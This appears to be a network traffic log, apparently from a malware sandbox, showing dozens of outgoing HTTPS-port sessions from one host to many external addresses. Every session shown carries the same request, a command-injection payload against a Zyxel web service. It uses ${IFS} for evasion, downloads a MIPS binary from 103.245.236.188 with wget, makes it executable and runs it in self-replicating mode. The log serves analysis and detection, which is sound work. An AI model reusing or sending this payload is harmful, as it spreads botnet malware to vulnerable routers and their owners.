                                    Jan 13, 2024 19:02:45.443439007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7196192.168.2.1335804172.253.237.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443489075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7197192.168.2.135062614.5.148.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443552971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7198192.168.2.1341780135.215.183.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443607092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7199192.168.2.1349050182.135.37.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443679094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7200192.168.2.133613459.235.235.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443757057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7201192.168.2.1355042216.76.168.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443775892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7202192.168.2.134385041.127.179.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443824053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7203192.168.2.133889850.67.201.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443902016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7204192.168.2.135069223.129.242.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.443938971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7205192.168.2.135657854.242.217.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444020987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7206192.168.2.134507840.77.71.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444050074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7207192.168.2.1348632108.134.208.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444066048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7208192.168.2.1339610208.216.33.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444139957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7209192.168.2.133521223.14.78.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444207907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7210192.168.2.135265681.255.168.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444263935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7211192.168.2.135568032.194.251.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444313049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7212192.168.2.135080217.184.251.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444385052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7213192.168.2.1359772138.133.185.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444477081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7214192.168.2.13520081.236.124.169443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444540024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7215192.168.2.1354098172.170.250.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444602966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7216192.168.2.1350798101.193.133.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444679022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7217192.168.2.1337066184.171.234.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444746971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7218192.168.2.1357674113.57.182.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444804907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7219192.168.2.1355286219.20.24.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444837093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7220192.168.2.134880876.135.79.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444899082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7221192.168.2.134262485.36.233.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.444955111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7222192.168.2.1333502195.199.247.144443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445008993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7223192.168.2.134538063.80.85.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445065022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7224192.168.2.134914474.52.51.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445130110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7225192.168.2.133973662.88.121.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445159912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7226192.168.2.1344252188.11.16.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445204020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7227192.168.2.1348834131.144.169.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445247889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7228192.168.2.1346608220.70.4.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445307016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7229192.168.2.1345442172.222.133.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445367098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7230192.168.2.1355096153.32.121.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445415020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7231192.168.2.133391246.153.128.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445468903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7232192.168.2.1334670221.208.146.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445502996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7233192.168.2.134440499.73.123.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445559025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7234192.168.2.1354624140.88.204.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445622921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7235192.168.2.1343298101.89.34.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445656061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7236192.168.2.1347476196.172.30.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445722103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7237192.168.2.1346660199.204.166.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445756912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7238192.168.2.1338824117.72.28.22443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445842028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7239192.168.2.135547012.101.28.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445914030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7240192.168.2.1342508213.0.203.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.445962906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7241192.168.2.1346474212.60.94.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446041107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7242192.168.2.1355380111.230.171.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446126938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7243192.168.2.1351408150.175.185.2443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446130037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7244192.168.2.134002232.171.45.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446218967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7245192.168.2.1352980122.183.213.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446245909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7246192.168.2.135191665.238.126.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446295977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7247192.168.2.1349562194.24.212.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446332932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7248192.168.2.133519431.220.90.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446399927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7249192.168.2.1339612206.33.100.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446449995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7250192.168.2.1353406142.234.244.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446494102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7251192.168.2.1340606191.103.33.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446548939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7252192.168.2.1353744106.210.232.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446609974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7253192.168.2.134710888.0.198.170443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446640968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7254192.168.2.1355760194.6.50.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446727991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7255192.168.2.1332946222.2.85.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446736097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7256192.168.2.1356766122.135.145.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446813107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7257192.168.2.134625447.92.231.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446887016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7258192.168.2.135685673.68.80.79443
                                    TimestampBytes transferredDirectionData
